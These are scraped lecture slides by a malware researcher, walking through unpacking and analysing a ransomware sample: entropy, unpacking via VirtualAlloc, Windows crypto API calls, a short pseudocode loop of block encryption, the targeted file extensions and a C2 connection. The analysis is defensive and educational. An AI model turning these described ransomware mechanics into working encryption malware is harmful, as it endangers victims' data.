![Page 58: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/58.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 58
High entropy.
![Page 59: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/59.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 59
Encrypted
Overlay
![Page 60: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/60.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 60
MFC (Microsoft Foundation Class) It is a collection of classes commonly
used in object oriented programming. Usually, MFC could be though as a wrapper for
windows API (similar a “proxy” role) that are written in C++.
No import
names
![Page 61: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/61.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 61
The IDAPro shows us
all function names
inside the MFC42.dll ,
but the reversing
analysis is very boring.
![Page 62: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/62.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 62
There is not any
Crypto function.
![Page 63: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/63.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 63
Classic unpacking process, loading DLLs one by one.
![Page 64: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/64.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 64
These new segments are
coming from VirtualAlloc( )
calls. Eventually, it could be
the unpacked executable
that we are looking for.
![Page 65: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/65.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 65
They are good signs Therefore, we can save this dump to disk.
![Page 66: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/66.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 66
The Crypto
functions
have arisen!
![Page 67: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/67.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 67
At this point
your life changes
(desperately
looking for a
backup).
![Page 68: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/68.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 68
from CryptImportKey( )
from CryptCreateHash( )
![Page 69: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/69.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 69
![Page 70: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/70.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 70
![Page 71: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/71.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 71
CryptSetKeyParam(hOriginalKey, AB_IV, new_IV)
while(block = NextBlockEncoding())
{
hDuplicateKey = CryptDuplicateKey(hOriginalKey)
CryptEncrypt(hDuplicateKey, block)
CryptDestroyKey(hDuplicateKey)
}
![Page 72: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/72.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 72
Usual place to set up
the persistence.
![Page 73: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/73.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 73
Looking for all file extensions to
encrypt their respective files and this
data reference is the list of all them!
![Page 74: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/74.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 74
Few extensions that are looked
by the ransomware and, among
them, .dbf (from Oracle
databases).
![Page 75: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/75.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 75
Connect to author’s
server using username
and password.
![Page 76: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/76.jpg)
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 76
We could use
Wireshark, couldn’t we ?
![Page 77: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/77.jpg)
REMEMBER
HTTP://ALEXANDREBORGES.ORG 77
We are always in CONTROL...
![Page 78: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/78.jpg)
HTTP://ALEXANDREBORGES.ORG 78
![Page 79: MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11 • And about Injection techniques? There are many methods: •Remote DLL Injection](https://reader031.fdocuments.in/reader031/viewer/2022011823/5ed3823d62e058372d439b95/html5/thumbnails/79.jpg)
THANK YOU FOR ATTENDING MY LECTURE!
LinkedIn: http://www.linkedin.com/in/aleborges
Twitter: @ale_sp_brazil
Blog: http://alexandreborges.org
E-mail: [email protected]
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware
Analysis, Memory Analysis, Digital Forensics,
Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-
instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of the The Journal of Digital
Forensics, Security and Law
• Refereer on Digital Investigation:The International
Journal of Digital Forensics & Incident Response
• Author of “Oracle Solaris Advanced Administration
book”